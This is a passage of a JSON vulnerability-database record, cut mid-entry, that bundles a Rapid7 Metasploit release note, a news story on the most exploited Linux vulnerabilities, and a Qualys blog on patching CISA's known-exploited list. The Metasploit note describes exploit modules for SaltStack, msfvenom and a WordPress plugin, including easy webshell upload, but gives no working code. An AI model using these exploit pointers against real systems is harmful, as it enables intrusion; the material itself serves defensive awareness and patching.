\"$upload_file\" \"$verbose\"\r\n\r\necho", "sourceHref": "https://www.exploit-db.com/download/49178", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-11-13T20:46:22", "description": "## SaltStack RCE\n\n\n\n[wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14379>) that targets SaltStack\u2019s Salt software. Specifically, the module exploits both an authentication bypass (CVE-2020-25592) and a command injection vulnerability (CVE-2020-16846) in SaltStack\u2019s REST API to get code execution as `root` through Salt\u2019s SSH client on infected versions. You can read more about the vulns [on AttackerKB](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution?referrer=wrapup#rapid7-analysis>).\n\n## Hack Metasploit with Metasploit\n\n[justinsteven](<https://github.com/justinsteven>) both discovered a vulnerability (CVE-2020-7384) in and added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14331>) for Metasploit\u2019s `msfvenom` utility. `msfvenom` allows users to use custom apk templates to inject a payload into; however, `msfvenom` does not sanitize certain fields, such as the `Owner` field, that get passed into a `Open3.popen3()` call. Because of this, an unsuspecting user of `msfvenom` might use a malicious template and subsequently give an attacker a shell on the user\u2019s computer. This issue has been fixed in Metasploit\u2019s `6.0.12` release and Metasploit Pro\u2019s `4.19.0` release.\n\n## Wordpress File Manager RCE\n\n[ide0x90](<https://github.com/ide0x90>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14253>) that targets various versions of a popular Wordpress plugin, `Wordpress File Manager`. The vulnerability (CVE-2020-25213) is due to a leftover example file that enables unauthenticated execution of a set of commands. One of those commands is an `upload` command, which makes uploading a php webshell and getting code execution effortless.\n\n## Apache Zookeeper Info Disclosure\n\n[juushya](<https://github.com/juushya>) added an auxiliary [module](<https://github.com/rapid7/metasploit-framework/pull/14269>) that obtains useful information such as IPs of connected clients, server OS information and statistics, and log files from Apache Zookeeper instances.\n\n## New modules (4)\n\n * [SaltStack Salt REST API Arbitrary Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14379>) by wvu and KPC, which exploits [CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection?referrer=wrapup#rapid7-analysis>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\n * [WordPress File Manager Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14253>) by Alex Souza (w4fz5uck5) and Imran E. Dawoodjee, which exploits [CVE-2020-25213](<https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213>)\n * [Rapid7 Metasploit Framework msfvenom APK Template Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14331>) by Justin Steven, which exploits [CVE-2020-7384](<https://attackerkb.com/topics/MmrdI6rWUn/cve-2020-7384>)\n * [Apache ZooKeeper Information Disclosure](<https://github.com/rapid7/metasploit-framework/pull/14269>) by Karn Ganeshen\n\n## Enhancements and features\n\n * PR [#14387](<https://github.com/rapid7/metasploit-framework/pull/14387>) by [adfoster-r7](<https://github.com/adfoster-r7>) added a check to ensure that uses of `AutoCheck` are always prepended as opposed to included in modules.\n * PR [#14373](<https://github.com/rapid7/metasploit-framework/pull/14373>) by [dwelch-r7](<https://github.com/dwelch-r7>) removed the unused Netware console session type from Framework.\n * PR [#14371](<https://github.com/rapid7/metasploit-framework/pull/14371>) by [h00die](<https://github.com/h00die>) added vulnerable version information to the `auxiliary/scanner/http/drupal_views_user_enum` module.\n * PR [#14353](<https://github.com/rapid7/metasploit-framework/pull/14353>) by [agalway-r7](<https://github.com/agalway-r7>) modified the `msfdb` command to show more readable and informative output to the user.\n\n## Bugs fixed\n\n * PR [#14304](<https://github.com/rapid7/metasploit-framework/pull/14304>) by [b4rtik](<https://github.com/b4rtik>) updated the `post/windows/manage/execute_dotnet_assembly` module to be able to handle additional function signatures of the code that will be injected into.\n * PR [#14382](<https://github.com/rapid7/metasploit-framework/pull/14382>) from [h00die](<https://github.com/h00die>) fixed a crash in the `auxiliary/analyze/apply_pot` module caused by an out-of-date symbol name.\n * PR [#14378](<https://github.com/rapid7/metasploit-framework/pull/14378>) by [adfoster-r7](<https://github.com/adfoster-r7>) added proper synchronization to the job status tracker that is used by Metasploit\u2019s RPC service.\n * PR [#14370](<https://github.com/rapid7/metasploit-framework/pull/14370>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) fixed a crash in `msfconsole`\u2019s `generate` command caused by attempting to tab complete input with no results.\n * PR [#14363](<https://github.com/rapid7/metasploit-framework/pull/14363>) by [zeroSteiner](<https://github.com/zeroSteiner>) fixed an issue in the `auxiliary/scanner/smb/smb_login` module that reported false negatives for valid credentials when `msfconsole` was started with `bundle exec` preceding the command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-11-05T10%3A12%3A21-06%3A00..2020-11-12T16%3A18%3A40%2B00%3A00%22>)\n * [Full diff 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/compare/6.0.15...6.0.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-11-13T19:08:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16846", "CVE-2020-25213", "CVE-2020-25592", "CVE-2020-7384"], "modified": "2020-11-13T19:08:01", "id": "RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7", "href": "https://blog.rapid7.com/2020/11/13/metasploit-wrap-up-87/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}